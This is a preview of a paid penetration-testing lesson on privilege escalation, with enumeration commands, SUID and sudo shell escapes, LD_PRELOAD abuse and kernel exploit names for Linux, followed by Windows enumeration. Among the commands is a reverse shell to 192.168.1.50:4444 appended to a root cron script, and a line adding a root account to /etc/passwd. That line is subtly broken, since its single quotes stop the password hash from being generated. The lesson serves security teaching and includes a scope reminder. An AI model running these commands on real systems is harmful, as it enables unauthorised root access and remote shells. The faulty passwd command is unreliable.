You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
After gaining initial access to a system (often as a low-privilege user), privilege escalation is the process of elevating your permissions — typically to root on Linux or SYSTEM/Administrator on Windows. This is a critical pentest phase because it demonstrates the full impact of an initial compromise.
Authorisation: Privilege escalation should only be attempted on systems within your agreed scope. Document every step.
Before attempting any escalation, gather information:
# Current user and groups
whoami
id
groups
# System information
uname -a
cat /etc/os-release
hostname
# Other users
cat /etc/passwd
cat /etc/shadow # if readable — immediate win
# Running processes
ps aux
# Network connections
ss -tulnp
netstat -antp
# Installed packages (look for outdated software)
dpkg -l # Debian/Ubuntu
rpm -qa # RHEL/CentOS
SUID (Set User ID) binaries execute with the owner's privileges — often root:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \;
# /usr/bin/vim
vim -c ':!bash'
# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/nmap (old versions with interactive mode)
nmap --interactive
!sh
Resource: GTFOBins (gtfobins.github.io) lists Unix binaries that can be exploited for privilege escalation.
# Check what you can run as sudo
sudo -l
# Example: user can run vim as root
# sudo vim -c ':!bash'
# Example: user can run find as root
# sudo find / -exec /bin/bash \; -quit
# Example: user can run any command as another user
# sudo -u admin /bin/bash
# LD_PRELOAD exploitation (if env_keep += LD_PRELOAD)
# 1. Write a malicious shared library
# 2. sudo LD_PRELOAD=/tmp/exploit.so <allowed_command>
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Check for writable scripts called by cron
# If root's cron runs /opt/backup.sh and you can write to it:
echo '/bin/bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' >> /opt/backup.sh
# Check kernel version
uname -r
# Search for exploits
searchsploit linux kernel <version>
# Popular kernel exploits:
# DirtyPipe (CVE-2022-0847) — Linux 5.8+
# DirtyCow (CVE-2016-5195) — Linux 2.6.22–4.8.3
# PwnKit (CVE-2021-4034) — pkexec on most Linux distros
# World-writable files
find / -writable -type f 2>/dev/null
# Writable /etc/passwd (rare but critical)
# Add a new root user:
echo 'hacker:$(openssl passwd -1 password123):0:0::/root:/bin/bash' >> /etc/passwd
# Writable /etc/shadow
# Replace root password hash
# Writable PATH directories
echo $PATH
ls -la /usr/local/bin # if writable, create malicious binary
:: Current user and privileges
whoami
whoami /priv
whoami /groups
net user %username%
:: System information
systeminfo
hostname
:: Other users and groups
net user
net localgroup administrators
:: Running services
sc query state= all
wmic service get name,displayname,pathname,startmode
:: Network information
ipconfig /all
netstat -ano
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.